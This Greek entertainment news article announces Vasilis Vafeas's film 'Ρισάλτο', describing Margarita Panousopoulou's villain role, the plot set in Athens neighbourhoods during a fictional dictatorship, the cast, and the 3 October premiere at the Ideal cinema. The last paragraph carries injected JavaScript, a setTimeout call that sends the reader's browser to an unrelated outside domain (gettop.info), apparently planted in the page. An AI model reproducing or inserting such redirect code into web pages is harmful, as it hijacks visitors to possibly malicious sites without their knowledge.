Η Μαργαρίτα Πανουσοπούλου κάνει «Ρισάλτο» από 3 Οκτωβρίου στους κινηματογράφους

0
5

 

Οκτώ χρόνια μετά τις «Γυναικείες Συνομωσίες», την ταινία που στάθηκε η αφορμή ώστε να επιστρέψει η ίδια από τη Βρετανία στην Ελλάδα, η Μαργαρίτα Πανουσοπούλου συνεργάζεται ξανά με τον Βασίλη Βαφέα.

Αυτή τη φορά θα τη δούμε στο «Ρισάλτο», την ολοκαίνουρια ταινία του καταξιωμένου σκηνοθέτη, η οποία θα κάνει επίσημη πρεμιέρα στις 3 Οκτωβρίου στον κινηματογράφο Ideal και από τις 13 του ίδιου μήνα θα παίζεται στις σκοτεινές αίθουσες όλης της Ελλάδας.

Το ίδιο χαρισματική, ταλαντούχα, όμορφη με τότε και- σίγουρα- πιο ώριμη από ποτέ, η Μαργαρίτα θα ενσαρκώσει έναν… κόντρα ρόλο, αυτόν της «κακιάς». Όπως έχει δηλώσει η ίδια σε παλαιότερη συνέντευξή της (tospito.net/ Ευάννα Βενάρδου): «Βρίσκομαι στη ζωή του ήρωα για να τον διαβάλλω. Βέβαια, οι ταινίες του Βασίλη έχουν πάντα έντονο το κωμικό στοιχείο. Στην ταινία υποτίθεται πως έχει γίνει πραξικόπημα (άλλοι το λένε επανάσταση…) και ο ήρωας πρέπει να αποφασίσει: θα παραμείνει βολεμένος με την εξουσία ή πιστός στην ιδεολογία του, άρα κυνηγημένος; Η γυναίκα που ενσαρκώνω πάντως ανήκει στο στρατόπεδο των χαφιέδων- πραξικοπηματιών».

Η υπόθεση

Το φιλμ, τη σκηνοθεσία αλλά και το σενάριο του οποίου υπογράφει ο Βασίλης Βαφέας, είναι γυρισμένο σε γειτονιές της Αθήνας: από το Πέραμα και τη Δραπετσώνα, μέχρι το Παλαιό Φάληρο και τη Ν. Σμύρνη.

Εκεί βρίσκουμε τον κεντρικό ήρωα, τον Άρη (Νίκος Πουρσανίδης), έναν νεαρό σκηνοθέτη. Ο ίδιος επιχειρεί να ισορροπήσει την οικογενειακή του ζωή και τον περίγυρό του, που βάλλεται από τις δύσκολες οικονομικές συνθήκες, με τον απατηλά αστραφτερό κόσμο του θεάματος.

Το κυνήγι της πολυπόθητης ισορροπίας θα ταυτιστεί με την ερωτική αναζήτηση, η οποία όμως θα τον οδηγήσει σε μονοπάτια δύσβατα. Τα πράγματα θα γίνουν πιο εφιαλτικά, με την εγκαθίδρυση μιας δικτατορίας. Τι ρόλο θα παίξει, άραγε, η βοηθός του σκηνοθέτη, η Μάρω (Μαργαρίτα Πανουσοπούλου), μια γυναίκα με σκοτεινά κίνητρα που έχει βάλει σκοπό να τον διαβάλλει και να τον χειραγωγήσει; Η συνέχεια στη μεγάλη οθόνη…

Τον πρωταγωνιστικό ρόλο κρατά ο Νίκος Πουρσανίδης.

Μαζί τους οι: Αμαλία Αρσένη, Ρίτα Αντωνοπούλου, Μαρία Κατσανδρή, Τάκης Παπαματθαίου, Θανάσης Κουρλαμπάς, Σταύρος Μερμήγκης, Πάνος Βίτσικας κ.ά.

Κλείστε θέση!
Το «Ρισάλτο» θα κάνει την επίσημη πρεμιέρα του τη Δευτέρα 3 Οκτωβρίου στον κινηματογράφο Ideal (Πανεπιστημίου 46, είσοδος μόνο με προσκλήσεις) και από την Πέμπτη 13 Οκτωβρίου θα παίζεται στις σκοτεινές αίθουσες όλης της Ελλάδας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here